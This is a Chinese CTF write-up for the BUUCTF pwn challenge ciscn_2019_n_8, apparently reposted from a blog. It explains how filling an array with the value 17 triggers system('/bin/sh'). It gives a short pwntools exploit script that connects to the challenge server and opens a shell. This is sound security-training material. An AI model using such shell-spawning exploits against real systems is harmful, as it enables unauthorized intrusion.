• [BUUCTF]PWN13——ciscn_2019_n_8


    [BUUCTF]PWN13——ciscn_2019_n_8

    题目网址:https://buuoj.cn/challenges#ciscn_2019_n_8

    步骤:
    例行检查,32位,保护开的挺多,canary(栈保护),nx(堆栈不可执行),PIE(地址随机化)
    在这里插入图片描述
    nc一下,看看程序大概的执行情况
    在这里插入图片描述
    32位ida载入,shift+f12查看程序里的字符串,看到了system和bin/sh
    在这里插入图片描述
    双击跟进,ctrl+x查看哪里调用了这个字符串
    在这里插入图片描述
    很简单的一个程序,一开始让我们输入name,之后只要var[13]=17就会调用system(‘/bin/sh’)获取shell
    我们只要将var这个数组里全部填上17即可通过判断

    EXP

    from pwn import*
    
    r=remote('node3.buuoj.cn',26348)
    payload=p32(17)*14
    
    r.sendline(payload)
    r.interactive()
    

    在这里插入图片描述
    一道简单的逻辑绕过,感觉跟保护机制没太大关系

  • 相关阅读:
    1 let和const
    ECMAScript 6 扫盲
    回溯法
    13. Ajax技术
    12.JSTL标签
    11.EL(表达式语言)
    10.正则表达式(未完成)
    博客园自定义样式
    9.一次简单的Web作业
    8.JavaScript
  • 原文地址:https://www.cnblogs.com/xlrp/p/14273721.html
Copyright © 2020-2023  润新知